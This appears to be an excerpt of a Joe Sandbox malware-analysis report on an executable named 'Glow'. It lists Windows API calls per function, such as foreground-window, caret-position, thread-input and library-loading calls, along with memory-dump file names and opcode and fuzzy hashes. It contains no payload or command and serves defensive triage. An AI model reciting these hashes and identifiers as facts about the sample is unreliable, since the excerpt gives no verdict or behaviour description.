                                                                                                                                                                          • Opcode Fuzzy Hash: b328ff7a0de1568bcfe9f720117d1cad5f30033a5137195e28368829c789f154
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A313C70D406A8AEFF378B6688057FFFBA6BF85310F04832AE485561E1C3749A45CB95
                                                                                                                                                                          APIs
                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 004180D4
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041814A
                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 0041815A
                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 004181C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                          • Opcode ID: 9a14db07469a51e9479bff3c98514684d18171e4004546332983e3eea558f9eb
                                                                                                                                                                          • Instruction ID: 4d35fb99aa2b3cb0219f86d187d134faa44abbb8091bbff25ca3dabcd88b35c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a14db07469a51e9479bff3c98514684d18171e4004546332983e3eea558f9eb
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E41A072B00615EFCB11CF58C880AEA7BF5BF45314F1440AEE9449B361CB78E882CB88
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00412187
                                                                                                                                                                            • Part of subcall function 003E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E43AD
                                                                                                                                                                            • Part of subcall function 003E4393: GetCurrentThreadId.KERNEL32 ref: 003E43B4
                                                                                                                                                                            • Part of subcall function 003E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E2F00), ref: 003E43BB
                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 0041219B
                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 004121E8
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004121EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                          • Opcode ID: 3e68a24382667fba6fddb314efe81d9084bb4403d40582c4d5c39f47d3551155
                                                                                                                                                                          • Instruction ID: 9327bc2d74e82ed35a8be6bae01ae5a06615ee4020fed841f986d478d4a64b35
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e68a24382667fba6fddb314efe81d9084bb4403d40582c4d5c39f47d3551155
                                                                                                                                                                          • Instruction Fuzzy Hash: 083143B5D00209AFC705EFA9C981CEEB7F8EF48304B5084AAE515EB251E675DE45CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003EE8E2
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003EE8F9
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003EE924
                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 003EE92F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                          • Opcode ID: 80ad61cd0cda56f9bf0bb5adf792b4e641704192e1c6092b7402ab8e95d7d5b8
                                                                                                                                                                          • Instruction ID: 4b170c20a122a9d91d54ea31a21b523657bb020eeea128c854042fd2cdd4894d
                                                                                                                                                                          • Opcode Fuzzy Hash: 80ad61cd0cda56f9bf0bb5adf792b4e641704192e1c6092b7402ab8e95d7d5b8
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F21E571D00224AFCB12AFA4D981BAEB7F8EF46320F114165F804BF281D7749E41C7A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0041DC30), ref: 003EDBA6
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003EDBB5
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003EDBC4
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0041DC30), ref: 003EDC21
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2267087916-0
                                                                                                                                                                          • Opcode ID: bb4434ae3e4590e424a0e9ca7b5c2ce0ee984951c65d95aafdebddd283fcf904
                                                                                                                                                                          • Instruction ID: 0c393d3144ddcf249549b6d8a8724571793948dd1f660b2933f33d8b29afac87
                                                                                                                                                                          • Opcode Fuzzy Hash: bb4434ae3e4590e424a0e9ca7b5c2ce0ee984951c65d95aafdebddd283fcf904
                                                                                                                                                                          • Instruction Fuzzy Hash: BE21A3705043159FC711EF25C98089BB7E8EF563A4F204B59F4A9C72E1D731D94ACB82
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 004132A6
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004132C0
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004132CE
                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004132DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                          • Opcode ID: b9036b66c146d2a7efb2816eb0d0ae70fa286054083b6ef18c443e4884ebb82c
                                                                                                                                                                          • Instruction ID: 80ef880fefaea5fa894ff0099186e59198aafdbc286e0c5e67b51ba8be75d804
                                                                                                                                                                          • Opcode Fuzzy Hash: b9036b66c146d2a7efb2816eb0d0ae70fa286054083b6ef18c443e4884ebb82c
                                                                                                                                                                          • Instruction Fuzzy Hash: 6221C431604111AFD715AF24C845FEA7B95FF81325F248299F8268B2D2C775ED81C7D8
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,003E8271,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?), ref: 003E96F3
                                                                                                                                                                            • Part of subcall function 003E96E4: lstrcpyW.KERNEL32(00000000,?,?,003E8271,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E9719
                                                                                                                                                                            • Part of subcall function 003E96E4: lstrcmpiW.KERNEL32(00000000,?,003E8271,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?), ref: 003E974A
                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E828A
                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E82B0
                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E82EB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                          • Opcode ID: c7e5a3be7a3f433c04d1917e33d74068eec434eca8e2868f3620253f9afc1a71
                                                                                                                                                                          • Instruction ID: 4ad4666b56c8f170f17d9d2ae5b583da842a9248a044d968fedc74d12fc8f3a0
                                                                                                                                                                          • Opcode Fuzzy Hash: c7e5a3be7a3f433c04d1917e33d74068eec434eca8e2868f3620253f9afc1a71
                                                                                                                                                                          • Instruction Fuzzy Hash: 4811267E600391AFCB169F39C845EBA77A9FF49750B10812AF946CB290EF319801C794
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 0041615A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041616C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00416177
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 004162B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                          • Opcode ID: fb472581b2d2d024d03779e7e8837e2c0142f8ef9162cd38d56f5795895d0fec
                                                                                                                                                                          • Instruction ID: 2f1baeeb8367a833f27aefe8ddd94521cbeef18d98e065d6120ade627d54f30a
                                                                                                                                                                          • Opcode Fuzzy Hash: fb472581b2d2d024d03779e7e8837e2c0142f8ef9162cd38d56f5795895d0fec
                                                                                                                                                                          • Instruction Fuzzy Hash: D111D675600208A6DB10DF648C84AEF777CEB51354B10412BF915D5282E7B8C981CB69
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 31dfff158d0183711555335d4a1a03e6ed72202dd3a4b8f76913e202524f8b5e
                                                                                                                                                                          • Instruction ID: 462a8da63caf194ee8566974efac3802d12b2a333b04257d0542656c856d3be8
                                                                                                                                                                          • Opcode Fuzzy Hash: 31dfff158d0183711555335d4a1a03e6ed72202dd3a4b8f76913e202524f8b5e
                                                                                                                                                                          • Instruction Fuzzy Hash: C901A2B260921A7EF62236786CC0FE7670DDF413BCB314729B721A55D1DA608C408264
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003E2394
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E23A6
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E23BC
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E23D7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 3f973db48d31d4630d1e325090f4b90e578fad9e39b5ee7d0ac3da11c590d0d0
                                                                                                                                                                          • Instruction ID: 6ad37cff5e47cf7b71ca3a428b376f99803aa174699e5c154f3dc13bbb6324db
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f973db48d31d4630d1e325090f4b90e578fad9e39b5ee7d0ac3da11c590d0d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 7011097A900228FFEB119BA5CD85F9EBB78FB08750F210191EA01B7290D7716E10DB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 003EEB14
                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 003EEB47
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003EEB5D
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003EEB64
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                          • Opcode ID: 12f88db02a8dc4e4519ed436ed83b6889a6bec5b0ae36b0cefd46e4d12d3612f
                                                                                                                                                                          • Instruction ID: db5ad8a6cc70fdee6d1a9839c3657ff4a041abfbb74b53fdab8935e7401ddb23
                                                                                                                                                                          • Opcode Fuzzy Hash: 12f88db02a8dc4e4519ed436ed83b6889a6bec5b0ae36b0cefd46e4d12d3612f
                                                                                                                                                                          • Instruction Fuzzy Hash: BC1108B2D04279BBC7029FB89C05ADA7FACAB46311F018326F815D32D1D6B4C9048764
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,003AD369,00000000,00000004,00000000), ref: 003AD588
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003AD594
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 003AD59B
                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 003AD5B9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                          • Opcode ID: d0379268af2f671a9975a6e7c109d3d2b8eb73e5fd3f33784a5e0233b638ceac
                                                                                                                                                                          • Instruction ID: 851785ecd6b0f42fca12db3df9d4e56363c2c401a59da3011ef0d618a7f2979c
                                                                                                                                                                          • Opcode Fuzzy Hash: d0379268af2f671a9975a6e7c109d3d2b8eb73e5fd3f33784a5e0233b638ceac
                                                                                                                                                                          • Instruction Fuzzy Hash: D4019676C041147BDB126FA5DC09BAA7B69EF47735F114225F9268A5E0DF708900C6A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003878B1
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 003878C5
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 003878CF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                          • Opcode ID: 3a41b260b8003169d930872ee518cea9cae44a0ae6890e9ef9e20dceffb87f13
                                                                                                                                                                          • Instruction ID: 444ab0d67dfa5896aa1ad1e71f2e8a33a9358d414b32ba13779c92c760c56762
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a41b260b8003169d930872ee518cea9cae44a0ae6890e9ef9e20dceffb87f13
                                                                                                                                                                          • Instruction Fuzzy Hash: 53118BB2905248BFDF026F90CC59EEA7B6AFF08364F154126FA1052160D731DC60EBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,003B338D,00000364,00000000,00000000,00000000,?,003B35FE,00000006,FlsSetValue), ref: 003B3418
                                                                                                                                                                          • GetLastError.KERNEL32(?,003B338D,00000364,00000000,00000000,00000000,?,003B35FE,00000006,FlsSetValue,00423260,FlsSetValue,00000000,00000364,?,003B31B9), ref: 003B3424
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003B338D,00000364,00000000,00000000,00000000,?,003B35FE,00000006,FlsSetValue,00423260,FlsSetValue,00000000), ref: 003B3432
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: d2881cf1b7f0e896af76f62c2440bd2805c82abf748964df450532c48b88c8f5
                                                                                                                                                                          • Instruction ID: 22c47f439c391b19fc716bffd247f116fea26ada992ebe9214c1cc172e9c68ed
                                                                                                                                                                          • Opcode Fuzzy Hash: d2881cf1b7f0e896af76f62c2440bd2805c82abf748964df450532c48b88c8f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 2801F776A11232ABCB234B7A9C44AD77B58BF44B657624230FB16D3980CB30DE01C6E4
                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBA8B
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBAB0
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBABA
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EB69A,?,00008000), ref: 003EBAED
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                          • Opcode ID: d344c5f28bc631005a91b5b483c09343ecfa3d447dfd641c906e86914ceb38ac
                                                                                                                                                                          • Instruction ID: 8c5c305c9900868bfbb98370af11e2498a74829634f26976a794fa88f24fcfa6
                                                                                                                                                                          • Opcode Fuzzy Hash: d344c5f28bc631005a91b5b483c09343ecfa3d447dfd641c906e86914ceb38ac
